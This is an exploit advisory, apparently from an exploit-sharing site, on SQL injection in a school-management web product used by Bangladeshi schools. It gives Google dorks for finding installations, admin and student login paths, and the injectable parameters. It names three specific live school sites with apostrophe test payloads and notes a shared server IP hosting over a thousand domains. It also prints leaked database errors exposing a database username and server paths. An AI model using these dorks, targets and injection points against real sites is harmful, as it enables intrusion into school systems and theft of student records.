##################################################################### # Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 08/01/2019 # Vendor Homepage : sikdercomputer.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd intext:''Powered by Sikder Computer'' site:edu.bd # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084 ##################################################################### # Admin/Teacher/Student Panel Login Path : *************************************** /PATH/admin/index /PATH/students_panel/index # SQL Injection Exploit : *********************** [PATH]/view_gallery_meetings?page=[SQL Injection] [PATH]/current_success_students_info?id=[SQL Injection] [PATH]/ex_success_students_info?id=[SQL Injection] ##################################################################### # Example Vulnerable Sites => ***************************** Note : (67.23.238.179) => There are 1,107 domains hosted on this server. [+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27 [+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27 [+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27 ##################################################################### # SQL Database Error : ********************* Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost' (using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3 Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 5 Couldn't Connect to the database ***No database found *** Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19 ##################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #####################################################################